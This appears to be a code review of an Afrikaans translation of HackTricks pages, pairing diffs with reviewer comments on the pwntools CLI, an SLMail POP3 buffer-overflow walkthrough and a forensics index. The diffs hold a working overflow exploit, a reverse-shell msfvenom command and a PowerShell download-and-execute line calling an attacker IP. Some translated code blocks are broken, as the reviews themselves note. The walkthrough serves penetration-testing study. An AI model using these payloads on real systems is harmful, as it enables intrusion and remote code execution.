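Review bot: the `Pwn phd` section gains a Python block and a paragraph that are not translations of anything in the source: `r = remote('example.com', 1337)` followed by `data = r.recv()` and `hexdump(data)`, plus the paragraph beginning "Die hexdump-funksie in pwntools kan gebruik word". The section documents the `pwn phd <file>` command line, the snippet needs a live host, and as written it discards the result of `hexdump()` (it returns a string and prints nothing), so drop both and keep only the original `pwn phd <file>` fence. Also keep subcommand names untranslated in headings: `# Pwn siklies` should stay `# Pwn cyclic`, and `# Grys hex` should be `# Pwn hex` (`Pwn` is the program name, not the word grey). Smaller fixes: `vermyt byte` should read `vermy bytes`; `Hef GDB aan 'n proses aan` should be `Heg GDB aan 'n proses` (attach); and `Ontbind heksadesimale opcodes` for `Disas hex opcodes` should use `Disassembleer`.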
@ -135,70 +125,59 @@ pwn phd <file>
|
|||
|
||||
# Pwn shellcraft
|
||||
|
||||
Get shellcodes
|
||||
|
||||
Kry skuldkodes
|
||||
```
|
||||
pwn shellcraft -l #List shellcodes
|
||||
pwn shellcraft -l #List shellcodes
|
||||
pwn shellcraft -l amd #Shellcode with amd in the name
|
||||
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
|
||||
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
|
||||
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
|
||||
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
|
||||
```
|
||||
**Kan kies:**
|
||||
|
||||
**Can select:**
|
||||
* shellkode en argumente vir die shellkode
|
||||
* Uitlêer
|
||||
* uitvoerformaat
|
||||
* foutopsporing (heg dbg aan shellkode)
|
||||
* voor (foutopsporingsval voor kode)
|
||||
* na
|
||||
* vermy gebruik van opcodes (verstek: nie nul en nuwe lyn)
|
||||
* Voer die shellkode uit
|
||||
* Kleur/geen kleur
|
||||
* lys stelseloproepe
|
||||
* lys moontlike shellkodes
|
||||
* Genereer ELF as 'n gedeelde biblioteek
|
||||
|
||||
* shellcode and arguments for the shellcode
|
||||
* Out file
|
||||
* output format
|
||||
* debug (attach dbg to shellcode)
|
||||
* before (debug trap before code)
|
||||
* after
|
||||
* avoid using opcodes (default: not null and new line)
|
||||
* Run the shellcode
|
||||
* Color/no color
|
||||
* list syscalls
|
||||
* list possible shellcodes
|
||||
* Generate ELF as a shared library
|
||||
|
||||
# Pwn template
|
||||
|
||||
Get a python template
|
||||
# Pwn sjabloon
|
||||
|
||||
Kry 'n Python-sjabloon
|
||||
```
|
||||
pwn template
|
||||
```
|
||||
|
||||
**Can select:** host, port, user, pass, path and quiet
|
||||
**Kan kies:** gasheer, poort, gebruiker, wagwoord, pad en stil
|
||||
|
||||
# Pwn unhex
|
||||
|
||||
From hex to string
|
||||
|
||||
Van heks na string
|
||||
```
|
||||
pwn unhex 686f6c61
|
||||
```
|
||||
# Pwn opdatering
|
||||
|
||||
# Pwn update
|
||||
|
||||
To update pwntools
|
||||
|
||||
Om pwntools op te dateer
|
||||
```
|
||||
pwn update
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
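Review bot: `Kry skuldkodes` under `# Pwn shellcraft` mistranslates shellcodes as debt codes; the option list a few lines below in the same hunk already uses `shellkode`, so use that (or leave `shellcodes`) consistently. The headings `# Pwn sjabloon` and `# Pwn opdatering` translate the subcommand names; keep `# Pwn template` and `# Pwn update`, because they are what the user types. Since the fence is touched anyway, two pre-existing defects in it are worth fixing in the same pass: `pwn shellcraft .r amd64.linux.bindsh 9095` has `.r` where the flag is `-r` (as the line above it uses), and the comment on `pwn shellcraft -f hex amd64.linux.sh #Create in C and run` does not describe `-f hex`.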
@ -1,33 +1,59 @@
|
|||
# Windows Exploiting (Basic Guide - OSCP lvl)
|
||||
# Windows Exploiting (Basiese Gids - OSCP vlak)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
## **Start installing the SLMail service**
|
||||
## **Begin met die installeer van die SLMail-diens**
|
||||
|
||||
## Restart SLMail service
|
||||
|
||||
Every time you need to **restart the service SLMail** you can do it using the windows console:
|
||||
## Herlaai SLMail-diens
|
||||
|
||||
Elke keer as jy die diens SLMail wil **herlaai**, kan jy dit doen deur die Windows-konsole te gebruik:
|
||||
```
|
||||
net start slmail
|
||||
```
|
||||
|
||||
![](<../.gitbook/assets/image (23) (1).png>)
|
||||
|
||||
## Very basic python exploit template
|
||||
## Baie basiese Python uitbuitingsjabloon
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import socket
|
||||
|
||||
# Verander hierdie waardes om die doelwit se IP-adres en poortnommer te spesifiseer
|
||||
target_ip = "192.168.1.100"
|
||||
target_port = 1337
|
||||
|
||||
# Skep 'n verbindingsobjek
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
# Verbind met die doelwit
|
||||
s.connect((target_ip, target_port))
|
||||
|
||||
# Stuur 'n uitbuitingsstring na die doelwit
|
||||
exploit_string = b"Exploit string goes here"
|
||||
s.send(exploit_string)
|
||||
|
||||
# Ontvang die antwoord van die doelwit
|
||||
response = s.recv(1024)
|
||||
print(response.decode())
|
||||
|
||||
# Sluit die verbindingsobjek
|
||||
s.close()
|
||||
```
|
||||
|
||||
Hierdie is 'n baie basiese sjabloon vir 'n Python-uitbuiting. Jy kan die waardes van `target_ip` en `target_port` verander om die IP-adres en poortnommer van die teiken te spesifiseer. Vervang die `exploit_string` met die spesifieke uitbuitingsstring wat jy wil stuur. Die program sal die uitbuitingsstring na die teiken stuur en die antwoord ontvang en druk.
|
||||
```python
|
||||
#!/usr/bin/python
|
||||
|
||||
|
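Review bot: a second, unrelated exploit template was inserted ahead of the page's own one: the block beginning `#!/usr/bin/env python3` with `target_ip = "192.168.1.100"` and `target_port = 1337`, plus the paragraph `Hierdie is 'n baie basiese sjabloon vir 'n Python-uitbuiting...`, now precede the original `#!/usr/bin/python` script, and the hunk header `@ -1,33 +1,59 @@` shows the file grew by 26 lines. Nothing in the source introduces it, and its port and `exploit_string = b"Exploit string goes here"` do not fit the SLMail POP3 walkthrough that follows (`port = 110`, `USER`/`PASS`). Remove the added block and paragraph so that `## Baie basiese Python uitbuitingsjabloon` is followed directly by the original script. Also `## Herlaai SLMail-diens`: `herlaai` means reload; `herbegin` (restart) is what `net start slmail` does and is the term the source uses.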
@ -39,99 +65,89 @@ port = 110
|
|||
|
||||
buffer = 'A' * 2700
|
||||
try:
|
||||
print "\nLaunching exploit..."
|
||||
s.connect((ip, port))
|
||||
data = s.recv(1024)
|
||||
s.send('USER username' +'\r\n')
|
||||
data = s.recv(1024)
|
||||
s.send('PASS ' + buffer + '\r\n')
|
||||
print "\nFinished!."
|
||||
print "\nLaunching exploit..."
|
||||
s.connect((ip, port))
|
||||
data = s.recv(1024)
|
||||
s.send('USER username' +'\r\n')
|
||||
data = s.recv(1024)
|
||||
s.send('PASS ' + buffer + '\r\n')
|
||||
print "\nFinished!."
|
||||
except:
|
||||
print "Could not connect to "+ip+":"+port
|
||||
print "Could not connect to "+ip+":"+port
|
||||
```
|
||||
## **Verander Immunity Debugger-lettertipe**
|
||||
|
||||
## **Change Immunity Debugger Font**
|
||||
Gaan na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
|
||||
|
||||
Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
|
||||
|
||||
## **Attach the proces to Immunity Debugger:**
|
||||
## **Koppel die proses aan Immunity Debugger:**
|
||||
|
||||
**File --> Attach**
|
||||
|
||||
![](<../.gitbook/assets/image (24) (1) (1).png>)
|
||||
|
||||
**And press START button**
|
||||
**En druk die START-knoppie**
|
||||
|
||||
## **Send the exploit and check if EIP is affected:**
|
||||
## **Stuur die uitbuit en kyk of EIP geraak word:**
|
||||
|
||||
![](<../.gitbook/assets/image (25) (1) (1).png>)
|
||||
|
||||
Every time you break the service you should restart it as is indicated in the beginnig of this page.
|
||||
Elke keer as jy die diens breek, moet jy dit herbegin soos aangedui aan die begin van hierdie bladsy.
|
||||
|
||||
## Create a pattern to modify the EIP
|
||||
## Skep 'n patroon om die EIP te wysig
|
||||
|
||||
The pattern should be as big as the buffer you used to broke the service previously.
|
||||
Die patroon moet so groot wees as die buffer wat jy vantevore gebruik het om die diens te breek.
|
||||
|
||||
![](<../.gitbook/assets/image (26) (1) (1).png>)
|
||||
|
||||
```
|
||||
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
|
||||
```
|
||||
Verander die buffer van die uitbuit en stel die patroon in en voer die uitbuit uit.
|
||||
|
||||
Change the buffer of the exploit and set the pattern and lauch the exploit.
|
||||
|
||||
A new crash should appeard, but with a different EIP address:
|
||||
'n Nuwe crash moet verskyn, maar met 'n ander EIP-adres:
|
||||
|
||||
![](<../.gitbook/assets/image (27) (1) (1).png>)
|
||||
|
||||
Check if the address was in your pattern:
|
||||
Kyk of die adres in jou patroon was:
|
||||
|
||||
![](<../.gitbook/assets/image (28) (1) (1).png>)
|
||||
|
||||
```
|
||||
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
|
||||
```
|
||||
Lyk asof **ons die EIP in offset 2606 kan wysig** van die buffer.
|
||||
|
||||
Looks like **we can modify the EIP in offset 2606** of the buffer.
|
||||
|
||||
Check it modifing the buffer of the exploit:
|
||||
|
||||
Kyk daarna deur die buffer van die aanval te wysig:
|
||||
```
|
||||
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
|
||||
```
|
||||
|
||||
With this buffer the EIP crashed should point to 42424242 ("BBBB")
|
||||
Met hierdie buffer moet die EIP-gekraakte punt na 42424242 ("BBBB") wys.
|
||||
|
||||
![](<../.gitbook/assets/image (30) (1) (1).png>)
|
||||
|
||||
![](<../.gitbook/assets/image (29) (1) (1).png>)
|
||||
|
||||
Looks like it is working.
|
||||
Dit lyk asof dit werk.
|
||||
|
||||
## Check for Shellcode space inside the stack
|
||||
## Kontroleer vir Shellcode-ruimte binne die stapel
|
||||
|
||||
600B should be enough for any powerfull shellcode.
|
||||
|
||||
Lets change the bufer:
|
||||
600B moet genoeg wees vir enige kragtige shellcode.
|
||||
|
||||
Laat ons die buffer verander:
|
||||
```
|
||||
buffer = 'A'*2606 + 'BBBB' + 'C'*600
|
||||
```
|
||||
|
||||
launch the new exploit and check the EBP and the length of the usefull shellcode
|
||||
Begin deur die nuwe uitbuiting te begin en die EBP en lengte van die bruikbare skuldkode te kontroleer.
|
||||
|
||||
![](<../.gitbook/assets/image (31) (1).png>)
|
||||
|
||||
![](<../.gitbook/assets/image (32) (1).png>)
|
||||
|
||||
You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
|
||||
Jy kan sien dat wanneer die kwesbaarheid bereik word, wys die EBP na die skuldkode en dat ons baie spasie het om 'n skuldkode hier te plaas.
|
||||
|
||||
In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
|
||||
In hierdie geval het ons **vanaf 0x0209A128 tot 0x0209A2D6 = 430B.** Genoeg.
|
||||
|
||||
## Check for bad chars
|
||||
|
||||
Change again the buffer:
|
||||
## Kontroleer vir slegte karakters
|
||||
|
||||
Verander weer die buffer:
|
||||
```
|
||||
badchars = (
|
||||
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
|
||||
|
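Review bot: the translated copy of the exploit body lost its indentation: under `try:` the lines `print "\nLaunching exploit..."`, `s.connect((ip, port))` and the rest, and `print "Could not connect to "+ip+":"+port` under `except:`, now start in column 0 where the original has them indented four spaces. Python rejects this with an IndentationError, so the script no longer runs; code fences must be copied byte for byte in a translation commit. While the line is touched: with `port = 110` (an int, per the hunk header) the handler `"Could not connect to "+ip+":"+port` itself raises a TypeError; `str(port)` fixes it. Other points: `skuldkode` in `die bruikbare skuldkode te kontroleer` and `wys die EBP na die skuldkode` should be `shellcode`; `Met hierdie buffer moet die EIP-gekraakte punt na 42424242 ("BBBB") wys` is garbled, something like `Met hierdie buffer moet die EIP by die crash na 42424242 ("BBBB") wys`; and `Consolas, Blod, 9` carries the source's `Blod` typo for `Bold`.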
@ -153,30 +169,27 @@ badchars = (
|
|||
)
|
||||
buffer = 'A'*2606 + 'BBBB' + badchars
|
||||
```
|
||||
Die slegte karakters begin by 0x01 omdat 0x00 amper altyd sleg is.
|
||||
|
||||
The badchars starts in 0x01 because 0x00 is almost always bad.
|
||||
Voer die aanval herhaaldelik uit met hierdie nuwe buffer deur die karakters wat nutteloos is, te verwyder:
|
||||
|
||||
Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:.
|
||||
Byvoorbeeld:
|
||||
|
||||
For example:
|
||||
|
||||
In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09).
|
||||
In hierdie geval kan jy sien dat **jy nie die karakter 0x0A moet gebruik nie** (niks word in die geheue gestoor aangesien die karakter 0x09 is).
|
||||
|
||||
![](<../.gitbook/assets/image (33) (1).png>)
|
||||
|
||||
In this case you can see that **the char 0x0D is avoided**:
|
||||
In hierdie geval kan jy sien dat **die karakter 0x0D vermy word**:
|
||||
|
||||
![](<../.gitbook/assets/image (34) (1).png>)
|
||||
|
||||
## Find a JMP ESP as a return address
|
||||
|
||||
Using:
|
||||
## Vind 'n JMP ESP as 'n terugkeeradres
|
||||
|
||||
Gebruik:
|
||||
```
|
||||
!mona modules #Get protections, look for all false except last one (Dll of SO)
|
||||
```
|
||||
|
||||
You will **list the memory maps**. Search for some DLl that has:
|
||||
Jy sal die geheuekaarte lys. Soek na 'n paar DLL's wat die volgende eienskappe het:
|
||||
|
||||
* **Rebase: False**
|
||||
* **SafeSEH: False**
|
||||
|
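Review bot: the sentence about the bad-char result inverts the original's meaning: `niks word in die geheue gestoor aangesien die karakter 0x09 is` says nothing is stored because the character is 0x09, whereas the source `nothing is saved in memory since the char 0x09` means that from 0x09 onward nothing further lands in memory (0x0A truncates the input). Suggest `niks word na die karakter 0x09 in die geheue gestoor nie`. Minor: the bold on `list the memory maps` was dropped in `Jy sal die geheuekaarte lys`, and `Soek na 'n paar DLL's` should stay singular (`'n DLL`), since one module is picked for the `!mona find` step.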
@ -186,30 +199,25 @@ You will **list the memory maps**. Search for some DLl that has:
|
|||
|
||||
![](<../.gitbook/assets/image (35) (1).png>)
|
||||
|
||||
Now, inside this memory you should find some JMP ESP bytes, to do that execute:
|
||||
|
||||
Nou, binne hierdie geheue moet jy 'n paar JMP ESP-bytes vind. Om dit te doen, voer die volgende uit:
|
||||
```
|
||||
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
|
||||
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
|
||||
```
|
||||
|
||||
**Then, if some address is found, choose one that don't contain any badchar:**
|
||||
**Dan, as 'n adres gevind word, kies een wat geen slegte karakters bevat nie:**
|
||||
|
||||
![](<../.gitbook/assets/image (36) (1).png>)
|
||||
|
||||
**In this case, for example: \_0x5f4a358f**\_
|
||||
|
||||
## Create shellcode
|
||||
**In hierdie geval, byvoorbeeld: \_0x5f4a358f**\_
|
||||
|
||||
## Skep shellcode
|
||||
```
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
|
||||
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
|
||||
```
|
||||
As die uitbuit nie werk nie, maar dit moet (jy kan sien met ImDebg dat die shellcode bereik word), probeer om ander shellcodes te skep (msfvenom sal verskillende shellcodes skep vir dieselfde parameters).
|
||||
|
||||
If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters).
|
||||
|
||||
**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
|
||||
|
||||
**Voeg 'n paar NOPS aan die begin** van die shellcode by en gebruik dit en die terugkeeradres om te JMP ESP, en voltooi die uitbuit:
|
||||
```bash
|
||||
#!/usr/bin/python
|
||||
|
||||
|
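Review bot: `ImDebg` in `jy kan sien met ImDebg dat die shellcode bereik word` is a typo inherited from the source; the tool is Immunity Debugger, which the page names in its own headings, so write it out. The unchanged mona fence keeps `# Search for opcodes insie dll space (JMP ESP)` with `insie` for `inside`; worth fixing while here. The rest of the hunk reads correctly, and the translation also repaired `msfvenom with create` into `msfvenom sal ... skep`.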
@ -248,39 +256,36 @@ shellcode = (
|
|||
|
||||
buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
|
||||
try:
|
||||
print "\nLaunching exploit..."
|
||||
s.connect((ip, port))
|
||||
data = s.recv(1024)
|
||||
s.send('USER username' +'\r\n')
|
||||
data = s.recv(1024)
|
||||
s.send('PASS ' + buffer + '\r\n')
|
||||
print "\nFinished!."
|
||||
print "\nLaunching exploit..."
|
||||
s.connect((ip, port))
|
||||
data = s.recv(1024)
|
||||
s.send('USER username' +'\r\n')
|
||||
data = s.recv(1024)
|
||||
s.send('PASS ' + buffer + '\r\n')
|
||||
print "\nFinished!."
|
||||
except:
|
||||
print "Could not connect to "+ip+":"+port
|
||||
print "Could not connect to "+ip+":"+port
|
||||
```
|
||||
|
||||
{% hint style="warning" %}
|
||||
There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
|
||||
Daar is shellcodes wat **hulself sal oorskryf**, daarom is dit belangrik om altyd 'n paar NOPs voor die shellcode by te voeg.
|
||||
{% endhint %}
|
||||
|
||||
## Improving the shellcode
|
||||
|
||||
Add this parameters:
|
||||
## Verbetering van die shellcode
|
||||
|
||||
Voeg hierdie parameters by:
|
||||
```
|
||||
EXITFUNC=thread -e x86/shikata_ga_nai
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
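Review bot: same indentation loss as in the earlier exploit block: the translated `try:`/`except:` bodies (`print "\nLaunching exploit..."` through `print "\nFinished!."`, and `print "Could not connect to "+ip+":"+port`) are at column 0, so the final exploit built from `buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode` is no longer valid Python. Restore the four-space indent exactly as in the original. The warning `Daar is shellcodes wat hulself sal oorskryf...` and the `EXITFUNC=thread -e x86/shikata_ga_nai` parameters are translated correctly.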
@ -1,40 +1,40 @@
|
|||
# Basic Forensic Methodology
|
||||
# Basiese Forensiese Metodologie
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
## Creating and Mounting an Image
|
||||
## Skep en Monteer 'n Beeld
|
||||
|
||||
{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md" %}
|
||||
[image-acquisition-and-mount.md](../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Malware Analysis
|
||||
## Malware-analise
|
||||
|
||||
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
|
||||
Dit is **nie noodwendig die eerste stap om uit te voer nadat jy die beeld het nie**. Maar jy kan hierdie malware-analise tegnieke onafhanklik gebruik as jy 'n lêer, 'n lêerstelselbeeld, geheuebeeld, pcap... het, so dit is goed om **hierdie aksies in gedagte te hou**:
|
||||
|
||||
{% content-ref url="malware-analysis.md" %}
|
||||
[malware-analysis.md](malware-analysis.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Inspecting an Image
|
||||
## Inspekteer 'n Beeld
|
||||
|
||||
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
|
||||
As jy 'n **forensiese beeld** van 'n toestel gekry het, kan jy begin **analiseer die partisies, lêerstelsel** wat gebruik word en **herwin** potensieel **interessante lêers** (selfs uitgewisde lêers). Leer hoe om dit te doen:
|
||||
|
||||
{% content-ref url="partitions-file-systems-carving/" %}
|
||||
[partitions-file-systems-carving](partitions-file-systems-carving/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Depending on the used OSs and even platform different interesting artifacts should be searched:
|
||||
Afhanklik van die gebruikte bedryfstelsels en selfs platforms moet verskillende interessante artefakte gesoek word:
|
||||
|
||||
{% content-ref url="windows-forensics/" %}
|
||||
[windows-forensics](windows-forensics/)
|
||||
|
